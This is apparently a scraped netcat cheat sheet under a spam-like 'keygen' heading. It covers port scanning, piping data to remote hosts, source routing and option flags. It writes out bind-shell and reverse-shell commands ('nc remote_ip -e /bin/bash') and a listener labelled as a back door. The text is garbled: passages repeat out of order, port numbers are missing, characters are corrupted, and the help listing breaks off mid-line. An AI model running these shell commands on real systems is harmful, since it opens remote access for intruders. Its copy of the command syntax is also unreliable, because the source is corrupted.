To make Netcat support the -e flag, it must be re-compiled with the DGAPING_SECURITY_HOLE option Port scan a remote host nc -v -z remote_host - Use the -i flag to set a delay interval: nc -Âi -v -z remote_host - Pipe command output to a netcat request | nc remote_host For example: echo "GET / HTTP/1.0 (enter) (enter) "| nc 80 Use source-routing to connect to a port on a remote host nc -Âg remote_host Note: Up to eight hop points may be specified using the -g flag.
NETCAT WINDOWS COMMAND LINE KEYGEN
To make Netcat support the -e flag, it must be re-compiled with the DGAPING_SECURITY_HOLE option Listen on a port and serve a bash shell upon connect nc -v -l -p -e /bin/bash Note that Netcat does not support the -e flag by default. For example: nc 21 25 80 Listen on a port for incoming connections (Also know as A Back Door) nc -v -l -p Connect to remote host and serve a bash shell nc remote_ip -e /bin/bash Note that Netcat does not support the -e flag by default. h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose (use twice to be more verbose) -w secs timeout for connects and final net reads -z zero-I/O mode (used for scanning) port numbers can be individual or ranges: m-n (inclusive) Connect to a port on a remote host nc remote_host Connect to multiple ports on a remote host nc remote_host. e prog inbound program to exec (dangerous!!) -g gateway source-routing hop point(s), up to 8 -G num source-routing pointer: 4, 8, 12.